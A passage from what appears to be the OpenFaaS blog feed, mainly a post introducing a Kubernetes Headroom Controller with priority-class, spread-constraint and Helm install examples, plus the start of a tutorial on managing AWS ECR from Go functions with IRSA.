  <li>Better for multi-tenant deployments, where one tenant cannot monopolise the queue as easily</li>
</ul>

<p>If you’d like a demo about asynchronous processing or long running jobs, please reach out via the <a href="https://openfaas.com/pricing">form on our pricing page</a>.</p>

<p>Use-cases:</p>

<ul>
  <li><a href="/blog/pdf-generation-at-scale-on-kubernetes">Generate PDFs at Scale</a></li>
  <li><a href="/blog/fan-out-and-back-in-using-functions/">Exploring the Fan out and Fan in pattern</a></li>
  <li><a href="/blog/what-goes-up-must-come-down/">On Autoscaling - What Goes Up Must Come Down</a></li>
</ul>

<p>Docs:</p>

<ul>
  <li><a href="https://docs.openfaas.com/async/">Docs: OpenFaaS Asynchronous Invocations</a></li>
  <li><a href="https://docs.openfaas.com/pro/jetstream-queue-worker/">Docs: OpenFaaS Queue Worker</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="queue" /><category term="async" /><category term="autoscaling" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[Queue Based Scaling is a long awaited feature that matches queued requests to the exact amount of replicas almost instantly.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-07-queue-based/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-07-queue-based/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Scale Up Pods Faster in Kubernetes with Added Headroom</title><link href="https://www.openfaas.com/blog/headroom-controller/" rel="alternate" type="text/html" title="Scale Up Pods Faster in Kubernetes with Added Headroom" /><published>2025-07-22T00:00:00+00:00</published><updated>2025-07-22T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/headroom-controller</id><content type="html" xml:base="https://www.openfaas.com/blog/headroom-controller/"><![CDATA[<p>Cluster Autoscalers add and remove Nodes to match the demand for resources. But they often leave no room for new Pods, adding an extra 1-2 minutes of latency.</p>

<blockquote>
  <p>Notice: The Headroom Controller is now out of the free beta/trial period. OpenFaaS customers can use it for free on licensed clusters. For everyone else, you can subscribe using the notes in the <a href="https://github.com/openfaas/faas-netes/blob/master/chart/headroom-controller/README.md">Helm chart README file</a>.</p>
</blockquote>

<p>That’s latency that you don’t want to pass onto your users.</p>

<p>In addition, when using spot instances, you’re given a very a short window to reschedule Pods from reclaimed nodes.</p>

<p>In this post we’ll introduce the new Headroom Controller developed and supported by the OpenFaaS team to help solve this problem. It’s installed via Helm, configured natively via its own Custom Resource Definition (CRD), with commercial support included.</p>

<p>It’s built for Kubernetes and works with any autoscaler. OpenFaaS isn’t required, but we think your users will appreciate the quicker scaling and start-up times.</p>

<p>Contents:</p>

<ul>
  <li><a href="#what-kind-of-autoscaling-does-openfaas-provide">What kind of autoscaling does OpenFaaS provide?</a></li>
  <li><a href="#what-is-a-cluster-autoscaler">What is a Cluster Autoscaler?</a></li>
  <li><a href="#what-are-spot-instances">What are spot instances?</a></li>
  <li><a href="#what-is-headroom">What is headroom?</a></li>
  <li><a href="#how-does-the-headroom-controller-work">How does the headroom controller work?</a></li>
  <li><a href="#getting-started-with-the-headroom-controller">Getting started with the headroom controller</a></li>
  <li><a href="#next-steps">Next steps</a></li>
</ul>

<h2 id="what-is-a-cluster-autoscaler">What is a Cluster Autoscaler?</h2>

<p>A cluster autoscaler works differently to the <a href="https://docs.openfaas.com/reference/autoscaling/">OpenFaaS autoscaler</a>. Instead of scaling the number of replicas or Pods for a function, it measures the demand in the cluster for CPU and RAM, then adds or removes nodes to match the demand.</p>

<p>When you combine a Pod autoscaler such as OpenFaaS or HPAv2 with a cluster autoscaler, you can optimise for cost and efficiency. You pack the most amount of Pods into the least amount of nodes.</p>

<p>For instance, if you run mainly batch jobs, file conversions, async workloads or ETL jobs - you may be able to scale down to zero Pods overnight, on the weekends or over the holidays. Over time the costs for compute add-up, even if you are using spot instances (mentioned below).</p>

<p>Two popular open source autoscalers are <a href="https://github.com/kubernetes/autoscaler">Cluster Autoscaler</a> - a mature and well supported project maintained by the Kubernetes Autoscaling SIG, and <a href="https://karpenter.sh/">Karpenter</a> - a modern and fast autoscaler developed by AWS for Elastic Kubernetes Service (EKS) and Azure Kubernetes Service (AKS).</p>

<p>Many cloud services have their own autoscaling groups or managed node pools, these should work just as well with the Headroom Controller.</p>

<h2 id="what-kind-of-autoscaling-does-openfaas-provide">What kind of autoscaling does OpenFaaS provide?</h2>

<p>OpenFaaS is a serverless platform for Kubernetes that provides an enterprise-grade self-hosted alternative to AWS Lambda.</p>

<p>It implements its own <em>horizontal scaling</em> for functions. Functions are implemented as Kubernetes Deployments, with a <code class="language-plaintext highlighter-rouge">.replicas</code> field in its spec. The autoscaler works by setting that field, and Kubernetes does the rest.</p>

<p>Unlike a generic autoscaler such as HPAv2 or KEDA, the OpenFaaS autoscaler is purpose built to scale functions. It can scale based on Requests Per Second (RPS), Inflight requests (capacity), CPU, RAM, Queue Depth, or any custom metric in Prometheus.</p>

<p>As additional replicas of a function are added into the cluster - they benefit from load balancing across multiple processes and machines to increase performance and to distribute work.ple.</p>

<p>The autoscaler will also scale idle functions to “zero” which causes all Pods to be terminated and the resources to be freed up.</p>

<h2 id="what-are-spot-instances">What are spot instances?</h2>

<p>OpenFaaS and its autoscaler can work on-premises, or in the cloud, but spot instances are really a feature of the cloud.</p>

<p>Providers such as AWS and GCP sell excess capacity within their infrastructure at a discount - up to 90% off the regular price. But this does come at a cost - the instance could be terminated at any time, and you may have a very short window to relocate your Pods to another node.</p>

<p>If an autoscaler like Karpenter has packed all your Pods into a single very large node, then you have a large failure domain and could incur significant disruption when the instance is terminated.</p>

<p>The best workloads for spot instances are stateless, and complete their work within a short period of time. Anything that may be stateful or run for a long time, should be avoided or made immutable, and able to restart from a checkpoint or the beginning.</p>

<p>Headroom can also help when spot instances are reclaimed, especially if you use a spread constraint, so the headroom is reserved over a number of instances.</p>

<p>You can learn more about OpenFaaS and Karpenter on the blog. We’ll include links in the conclusion.</p>

<h2 id="what-is-headroom">What is headroom?</h2>

<p>Cluster autoscalers tend to pack workloads into nodes as tightly as possible, meaning that if a new Pod is deployed or a workload scales up, a new node may have to be added to the cluster.</p>

<p>Adding a node can take 1-2 minutes, or even longer depending on the cluster and the cloud provider.</p>

<p>With headroom, a buffer of configurable size is added to the cluster with Pods which request resources, but simply run a sleep process. They run in a very low priority class, so that when a normal workload comes along, instead of waiting for a new node, the headroom Pods are evicted and the Pod starts immediately.</p>

<p>Then, the cluster autoscaler will request a new node in the background to add the headroom Pods back into the cluster.</p>

<p>In this way, the cluster maintains a buffer so resources can be added instantly when needed.</p>

<h2 id="how-does-the-headroom-controller-work">How does the headroom controller work?</h2>

<p>The Headroom Controller can be installed via Helm from the OpenFaaS chart repository.</p>

<p>Once installed, you can create a default and a low-priority class for the Kubernetes scheduler to use.</p>

<p>All Pods will assume the default priority class unless otherwise specified, which means they can always evict a headroom Pod.</p>

<p>Next, you can define one or more Headroom resources.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Headroom</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">openfaas.com/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">headroom</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">priorityClassName</span><span class="pi">:</span> <span class="s">headroom</span>
  <span class="na">requests</span><span class="pi">:</span>
    <span class="na">cpu</span><span class="pi">:</span> <span class="s">250m</span>
    <span class="na">memory</span><span class="pi">:</span> <span class="s">250Mi</span>
</code></pre></div></div>

<p>Now set up two priority classes.</p>

<ol>
  <li>Create a default priority priorityClassName</li>
</ol>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  kubectl apply <span class="nt">-f</span> - <span class="o">&lt;&lt;</span> <span class="no">EOF</span><span class="sh">
  apiVersion: scheduling.k8s.io/v1
  kind: PriorityClass
  metadata:
    name: default
  value: 1000
  globalDefault: true
  description: "Default priority class for all pods"
</span><span class="no">  EOF
</span></code></pre></div></div>

<ol>
  <li>Create a low priority class for the headroom Custom Resources</li>
</ol>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  kubectl apply <span class="nt">-f</span> - <span class="o">&lt;&lt;</span><span class="no">EOF</span><span class="sh">
  apiVersion: scheduling.k8s.io/v1
  kind: PriorityClass
  metadata:
    name: headroom
  description: Low priority class for headroom pods
  globalDefault: false
  preemptionPolicy: Never
  value: -10
</span><span class="no">  EOF
</span></code></pre></div></div>

<p>Within a short period of time, a new Deployment will be created with the request values you specified.</p>

<p>If these Pods cannot be scheduled, the autoscaler you’re using should request one or more new nodes to be added to the cluster to host them.</p>

<p>Then, whenever a new Pod is scheduled or updated which requires more resources than the cluster has available, the headroom Pods will be evicted and the new Pod will start immediately.</p>

<p>Watch a video demo of the Headroom Controller in action with the Cluster Autoscaler, K3s and Firecracker VMs managed by our Slicer product.</p>

<div style="width: ; margin:0 auto;">
    
    <div class="ytcontainer">
        <iframe class="yt" allowfullscreen="" src="https://www.youtube.com/embed/MHXvhKb6PpA"></iframe>
    </div>
</div>

<h3 id="spreading-headroom-over-multiple-nodes">Spreading headroom over multiple nodes</h3>

<p>If you are using a cluster autoscaler like Karpenter, you can spread the headroom over multiple nodes by using a spread constraint.</p>

<p>The below example will spread the headroom over 5 different nodes, with a hard constraint making sure that if a spot instance is terminated, you should have an immediate buffer available for the Pods that need to be relocated.</p>

<p>This can be a hard rule with <code class="language-plaintext highlighter-rouge">whenUnsatisfiable: DoNotSchedule</code> which won’t allow more than one headroom Pod on a node, or a soft rule with <code class="language-plaintext highlighter-rouge">whenUnsatisfiable: ScheduleAnyway</code> which will try its best to spread the Pods out across the cluster, but won’t block them if that’s not possible.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Headroom</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">openfaas.com/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">headroom-spread</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">replicas</span><span class="pi">:</span> <span class="m">5</span>
  <span class="na">topologySpreadConstraints</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">maxSkew</span><span class="pi">:</span> <span class="m">1</span>
      <span class="na">topologyKey</span><span class="pi">:</span> <span class="s">kubernetes.io/hostname</span>
      <span class="na">whenUnsatisfiable</span><span class="pi">:</span> <span class="s">DoNotSchedule</span>
      <span class="na">labelSelector</span><span class="pi">:</span>
        <span class="na">matchLabels</span><span class="pi">:</span>
          <span class="na">headroom</span><span class="pi">:</span> <span class="s">headroom-spread</span>
  <span class="na">priorityClassName</span><span class="pi">:</span> <span class="s">headroom</span>
  <span class="na">requests</span><span class="pi">:</span>
    <span class="na">cpu</span><span class="pi">:</span> <span class="s">500m</span> <span class="c1"># 0.5 vCPU</span>
    <span class="na">memory</span><span class="pi">:</span> <span class="s">512Mi</span> <span class="c1"># 512MB RAM</span>
</code></pre></div></div>

<p>All Pods created by the Headroom Controller will have the label <code class="language-plaintext highlighter-rouge">headroom: $NAME_OF_HEADROOM</code> which can be used to select them in a selector.</p>

<p>The following screenshot shows a K3s cluster with one master, and 5 additional nodes which have been added to the cluster to satisfy the spread constraint.</p>

<p><a href="/images/2025-07-headroom/spread.png"><img src="/images/2025-07-headroom/spread.png" alt="Spread out across 5x additional nodes" /></a></p>

<h3 id="scaling-the-headroom">Scaling the headroom</h3>

<p>The Headroom resource also has a <code class="language-plaintext highlighter-rouge">.replicas</code> field which works with <code class="language-plaintext highlighter-rouge">kubectl scale</code>, so that you can adjust the headroom according to your needs.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">replicas</span><span class="pi">:</span> <span class="m">10</span>
</code></pre></div></div>

<p>You could also write a simple Kubernetes Cron Job to scale the headroom down during the holidays, or overnight - if your product tends to be used more during the day.</p>

<p>Assuming that you create a service account for the Cron Job named i.e. <code class="language-plaintext highlighter-rouge">headroom-scaler</code> with permission to <code class="language-plaintext highlighter-rouge">update</code> the Headroom resource, it would look something like this:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">CronJob</span>
<span class="na">apiVersion</span><span class="pi">:</span> <span class="s">batch/v1</span>
<span class="na">metadata</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">scale-headroom</span>
<span class="na">spec</span><span class="pi">:</span>
  <span class="na">restartPolicy</span><span class="pi">:</span> <span class="s">OnFailure</span>
  <span class="na">schedule</span><span class="pi">:</span> <span class="s2">"</span><span class="s">0</span><span class="nv"> </span><span class="s">0</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*</span><span class="nv"> </span><span class="s">*"</span>
  <span class="na">jobTemplate</span><span class="pi">:</span>
    <span class="na">spec</span><span class="pi">:</span>
      <span class="na">template</span><span class="pi">:</span>
        <span class="na">spec</span><span class="pi">:</span>
          <span class="na">serviceAccountName</span><span class="pi">:</span> <span class="s">headroom-scaler</span>
          <span class="na">containers</span><span class="pi">:</span>
            <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">kubectl</span>
              <span class="na">image</span><span class="pi">:</span> <span class="s">alpine/kubectl:latest</span> <span class="c1"># Or a specific version</span>
              <span class="na">command</span><span class="pi">:</span>
              <span class="pi">-</span> <span class="s2">"</span><span class="s">/bin/sh"</span>
              <span class="pi">-</span> <span class="s2">"</span><span class="s">-c"</span>
              <span class="pi">-</span> <span class="pi">|</span>
                <span class="s">apk add --no-cache kubectl</span>
                <span class="s">kubectl scale headroom/openfaas-fn-buffer --replicas=0</span>
</code></pre></div></div>

<p>The Cron Job will scale the headroom down to 0 replicas at midnight every day.</p>

<p>You’d just need another one to set it back to the desired state later on.</p>

<p>A full example is available in the README for the headroom controller’s Helm chart.</p>

<h3 id="what-if-headroom-pods-need-a-securitycontext">What if Headroom Pods need a securityContext?</h3>

<p>If you are running <a href="https://kyverno.io/">Kyverno</a>, <a href="https://open-policy-agent.github.io/gatekeeper/website/docs/">Gatekeeper</a>, it’s likely that Pods cannot be scheduled without some kind of securityContext. We’ve thought of that already and have added a <code class="language-plaintext highlighter-rouge">.podSecurityContext</code> field to the Headroom resource.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">podSecurityContext</span><span class="pi">:</span>
    <span class="na">runAsNonRoot</span><span class="pi">:</span> <span class="no">true</span>
    <span class="na">runAsUser</span><span class="pi">:</span> <span class="m">1000</span>
    <span class="na">runAsGroup</span><span class="pi">:</span> <span class="m">1000</span>
    <span class="na">fsGroup</span><span class="pi">:</span> <span class="m">1000</span>
</code></pre></div></div>

<h3 id="tolerations-for-node-groups-and-spot-instances">Tolerations for node groups and spot instances</h3>

<p>Spot instances are used by many OpenFaaS customers in production for running functions. A taint is applied to the node group to prevent control plane workloads from running on them, then a toleration is required on the Function Pods to allow them to run on the node group. For Functions, this is achieved through a <a href="https://docs.openfaas.com/reference/profiles/">Profile</a>. Headroom resources specify it directly on their .Spec.</p>

<p>Here’s what we used during testing for AWS EKS with Karpenter, so that headroom Pods ran on spot instances.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">tolerations</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">karpenter.sh/node-group"</span>
      <span class="na">operator</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Equal"</span>
      <span class="na">value</span><span class="pi">:</span> <span class="s2">"</span><span class="s">spot"</span>
      <span class="na">effect</span><span class="pi">:</span> <span class="s2">"</span><span class="s">NoSchedule"</span>
</code></pre></div></div>

<p>For a self-hosted <a href="https://docs.slicervm.com/examples/ha-k3s/">HA K3s cluster with SlicerVM.com</a> running with our modified Cluster Autoscaler, you could try something like this:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl taint node k3s-cp-1 <span class="nb">cp</span>:NoSchedule
kubectl taint node k3s-cp-2 <span class="nb">cp</span>:NoSchedule
kubectl taint node k3s-cp-3 <span class="nb">cp</span>:NoSchedule
</code></pre></div></div>

<p>Or if there are no agents yet:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl taint node <span class="nt">--all</span> <span class="nb">cp</span>:NoSchedule
</code></pre></div></div>

<p>Followed by adding:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">priorityClassName</span><span class="pi">:</span> <span class="s">headroom</span>
  <span class="na">replicas</span><span class="pi">:</span> <span class="m">2</span>
  <span class="na">requests</span><span class="pi">:</span>
    <span class="na">cpu</span><span class="pi">:</span> <span class="s">500m</span>
    <span class="na">memory</span><span class="pi">:</span> <span class="s">512Mi</span>
  <span class="na">tolerations</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">effect</span><span class="pi">:</span> <span class="s">NoSchedule</span>
    <span class="na">key</span><span class="pi">:</span> <span class="s">cp</span>
    <span class="na">operator</span><span class="pi">:</span> <span class="s">Equal</span>
    <span class="na">value</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1"</span>
</code></pre></div></div>

<p>In that case, if you have no agents, the autoscaler will provision a new node to host the two new replicas of the headroom Pods.</p>

<h2 id="getting-started-with-the-headroom-controller">Getting started with the headroom controller</h2>

<p>You can get started right away, even if you’re not an OpenFaaS customer. OpenFaaS is not a pre-requisite, but we’ve put it under the brand to signal to customers that this is something we are supporting, and think is an important add-on for any cluster autoscaler.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update
</code></pre></div></div>

<p>Write a <code class="language-plaintext highlighter-rouge">values-custom.yaml</code> file.</p>

<p>Decide whether you want it to run across all namespaces in the cluster:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">rbac</span><span class="pi">:</span>
  <span class="na">role</span><span class="pi">:</span> <span class="s">ClusterRole</span>
</code></pre></div></div>

<p>Or to operate only in the namespace given to helm via the <code class="language-plaintext highlighter-rouge">--namespace</code> flag.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">role</span><span class="pi">:</span> <span class="s">Role</span>
</code></pre></div></div>

<p>There are some other flags to play with, but the defaults should be fine for most use cases.</p>

<p>You could install it into the <code class="language-plaintext highlighter-rouge">kube-system</code> namespace, the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace, or a custom one.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm upgrade <span class="nt">--install</span> headroom-controller openfaas/headroom-controller <span class="se">\</span>
	<span class="nt">--namespace</span> kube-system <span class="se">\</span>
	<span class="nt">-f</span> ./values-custom.yaml
</code></pre></div></div>

<p>Once you’ve got some confidence in how the controller works, you could add it to your GitOps repository with ArgoCD or Flux along with your other infrastructure tools such as cert-manager, ingress-nginx, external-secrets, and so forth.</p>

<h2 id="next-steps">Next steps</h2>

<p>Whilst this is a new project, we’ve tested it with <a href="https://karpenter.sh/">Karpenter</a>, and <a href="https://github.com/kubernetes/autoscaler">Cluster Autoscaler</a>, and it worked as expected.</p>

<p>You will need to spend some time fine-tuning your Headroom resources to get the best performance for your clusters and applications.</p>

<p>Feel free to reach out with your comments, questions, and suggestions.</p>

<p>During the beta period, anyone can try out the Headroom Controller for free without signing up for a subscription.</p>

<p>After the beta period, OpenFaaS customers get free access to the Headroom Controller as part of their subscription. For everyone else, you can <a href="https://github.com/openfaas/faas-netes/blob/master/chart/headroom-controller/README.md">purchase a license</a> for 300 USD/year per cluster - which is less than 1 USD per day for near-instant scaling and scheduling of Pods.</p>

<p>Even if you wanted to make your own controller for fun, you have to factor in the continued maintenance and support, and what happens when you leave the company. We’ve priced the controller at the point where it makes sense to outsource it.</p>

<p>You may also like these past blog posts:</p>

<ul>
  <li><a href="/blog/eks-openfaas-karpenter/">Save costs on AWS EKS with OpenFaaS and Karpenter</a></li>
  <li><a href="/blog/eks-openfaas-karpenter-gpu/">Scale to zero GPUs with OpenFaaS, Karpenter and AWS EKS</a></li>
  <li><a href="/blog/build-and-scale-python-function/">How to Build and Scale Python Functions with OpenFaaS</a></li>
  <li><a href="/blog/add-a-faas-capability/">Integrate a FaaS capability into your product</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="autoscaling" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[Does it take 1-2 minutes for new nodes to get added to your cluster? Add some headroom for an instant Pod start.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-07-headroom/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-07-headroom/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Manage AWS Resources from OpenFaaS Functions With IRSA</title><link href="https://www.openfaas.com/blog/irsa-functions/" rel="alternate" type="text/html" title="Manage AWS Resources from OpenFaaS Functions With IRSA" /><published>2025-07-09T00:00:00+00:00</published><updated>2025-07-09T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/irsa-functions</id><content type="html" xml:base="https://www.openfaas.com/blog/irsa-functions/"><![CDATA[<p>In this post we’ll create a function in Golang that uses AWS IAM and ambient credentials to create and manage resources in AWS.</p>

<p>As a built-in offering, AWS Lambda is often used to respond to events and to manage AWS resources, so how does OpenFaaS compare?</p>

<p>OpenFaaS is a self-hosted platform that can run on any cloud or on-premises, including AWS EKS. Whilst AWS Lambda is a popular and convenient offering, it does have some tradeoffs and limitations which can cause friction for teams with more specialised requirements, workflows, or high usage ($$$).</p>

<p>If your team is developing code for Kubernetes using AWS EKS, then OpenFaaS can be a more natural fit than AWS Lambda, since it can use the same workflows, tools and processes you already have in place for your existing Kubernetes applications. That includes Helm, CRDs, Kubernetes RBAC, container builders in CI/CD and ArgoCD/Flux.</p>

<p>Both AWS Lambda and OpenFaaS can be used to manage resources within AWS, with either shared credentials which need to be created, managed and rotated by your team, or with ambient credentials which are automatically obtained at runtime by the function.</p>

<p>Our function will be used to create repositories in Elastic Container Registry (ECR). This is a common task for teams that run <a href="https://www.openfaas.com/blog/build-a-multi-tenant-functions-platform/">OpenFaaS in a multi-tenant environment</a>, where each tenant or team publishes their own functions to the platform. It’ll receive credentials using IAM Roles for Service Accounts (IRSA), which is the most modern way to map Kubernetes Service Accounts to native AWS IAM roles.</p>

<p>Contents:</p>

<ul>
  <li><a href="#create-an-eks-cluster-with-irsa-enabled">Create an EKS cluster with IRSA enabled</a></li>
  <li><a href="#install-openfaas-standard-or-for-enterprises">Install OpenFaaS Standard or For Enterprises</a></li>
  <li><a href="#iam-policy-for-ecr-access">IAM Policy for ECR Access</a></li>
  <li><a href="#create-iam-role-and-service-account">Create IAM Role and Service Account</a></li>
  <li><a href="#create-a-function-that-uses-the-iam-role">Create a function that uses the IAM Role</a></li>
  <li><a href="#invoke-the-function-to-create-a-new-repository">Invoke the function to create a new repository</a></li>
  <li><a href="#wrapping-up-and-next-steps">Wrapping up and next steps</a></li>
</ul>

<h2 id="create-an-eks-cluster-with-irsa-enabled">Create an EKS cluster with IRSA enabled</h2>

<p>You may already have an AWS EKS cluster provisioned, if so, you can enable IRSA by following these instructions: <a href="https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html">IRSA on EKS</a>.</p>

<p>If not, we can create a quick cluster using the <a href="https://eksctl.io/">eksctl CLI tool</a>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>eksctl create cluster <span class="se">\</span>
    <span class="nt">--name</span> of-test <span class="se">\</span>
    <span class="nt">--with-oidc</span> <span class="se">\</span>
    <span class="nt">--spot</span> <span class="se">\</span>
    <span class="nt">--nodes</span> 1 <span class="se">\</span>
    <span class="nt">--nodes-max</span> 3 <span class="se">\</span>
    <span class="nt">--nodes-min</span> 1 <span class="se">\</span>
    <span class="nt">--region</span> eu-west-1
</code></pre></div></div>

<p>Whilst eksctl looks like an imperative CLI tool, it is a client that manages declarative CloudFormation templates under the hood. You’ll see the one created for your cluster by navigating to CloudFormation page of the AWS console. Provisioning can take up to 15-20 minutes depending on how many nodes and add-ons you’ve selected.</p>

<h2 id="install-openfaas-standard-or-for-enterprises">Install OpenFaaS Standard or For Enterprises</h2>

<p>If you don’t have OpenFaaS installed, you can follow the <a href="https://docs.openfaas.com/deployment/pro/">OpenFaaS installation guide</a>. If you already have OpenFaaS installed, you can skip this step.</p>

<p>For experimentation, you can use port-forwarding instead of setting up DNS and Ingress for the OpenFaaS gateway. It’ll make it a bit quicker to get started.</p>

<h2 id="iam-policy-for-ecr-access">IAM Policy for ECR Access</h2>

<p>We need to create an IAM Policy that will allow the OpenFaaS function to create and query repositories in ECR.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="s2">"ecr:CreateRepository"</span><span class="p">,</span><span class="w">
        </span><span class="s2">"ecr:DeleteRepository"</span><span class="p">,</span><span class="w">
        </span><span class="s2">"ecr:DescribeRepositories"</span><span class="w">
      </span><span class="p">],</span><span class="w">
      </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>You can create this role using the AWS CLI or the AWS Management Console. If you’re using the CLI, you can run the following command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam create-policy <span class="se">\</span>
  <span class="nt">--policy-name</span> ecr-create-query-repository <span class="se">\</span>
  <span class="nt">--policy-document</span> file://ecr-policy.json
</code></pre></div></div>

<p>Note down the given ARN, i.e.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "Policy": {
        "PolicyName": "ecr-create-query-repository",
        "Arn": "arn:aws:iam::ACCOUNT_NUMBER:policy/ecr-create-query-repository"
    }
}
</code></pre></div></div>

<h2 id="create-iam-role-and-service-account">Create IAM Role and Service Account</h2>

<p>The easiest way to create the IAM Role and Service Account is to use <code class="language-plaintext highlighter-rouge">eksctl</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">ARN</span><span class="o">=</span>arn:aws:iam::ACCOUNT_NUMBER:policy/ecr-create-query-repository

eksctl create iamserviceaccount <span class="se">\</span>
  <span class="nt">--name</span> openfaas-create-ecr-repo <span class="se">\</span>
  <span class="nt">--namespace</span> openfaas-fn <span class="se">\</span>
  <span class="nt">--cluster</span> of-test <span class="se">\</span>
  <span class="nt">--role-name</span> ecr-create-query-repository <span class="se">\</span>
  <span class="nt">--attach-policy-arn</span> <span class="nv">$ARN</span> <span class="se">\</span>
  <span class="nt">--region</span> eu-west-1 <span class="se">\</span>
  <span class="nt">--approve</span>
</code></pre></div></div>

<p>This can also be done manually by creating the IAM Role in AWS, followed by a correctly annotated Service Account in Kubernetes using the <code class="language-plaintext highlighter-rouge">eks.amazonaws.com/role-arn</code> annotation.</p>

<h2 id="create-a-function-that-uses-the-iam-role">Create a function that uses the IAM Role</h2>

<p>We are going to use Go to create this function. You can learn more about the Go template in the <a href="https://docs.openfaas.com/languages/go/">OpenFaaS documentation</a>.</p>

<p>AWS also has <a href="https://docs.aws.amazon.com/sdkref/latest/guide/overview.html">SDKs available for other languages</a> supported by OpenFaaS such as Python, Java, Node.js, C#, etc.</p>

<p>Create a new function using the <code class="language-plaintext highlighter-rouge">golang-middleware</code> template:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">OPENFAAS_PREFIX</span><span class="o">=</span>ttl.sh/openfaas

faas-cli new <span class="nt">--lang</span> golang-middleware ecr-create-repo
</code></pre></div></div>

<p>Edit the stack.yaml file to add an annotation stating which Kubernetes Service Account to use:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">functions:
</span>  ecr-create-repo:
<span class="gi">+    annotations:
+      com.openfaas.serviceaccount: openfaas-create-ecr-repo
</span></code></pre></div></div>

<p>Set the region for the function, along with the URL of the ECR registry:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">functions:
</span>  ecr-create-repo:
<span class="gi">+    environment:
+      AWS_REGION: eu-west-1
</span></code></pre></div></div>

<p>Add the AWS SDK for Go to the function as a dependency:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd </span>ecr-create-repo
go get github.com/aws/aws-sdk-go-v2/aws
go get github.com/aws/aws-sdk-go-v2/config
go get github.com/aws/aws-sdk-go-v2/service/ecr
</code></pre></div></div>

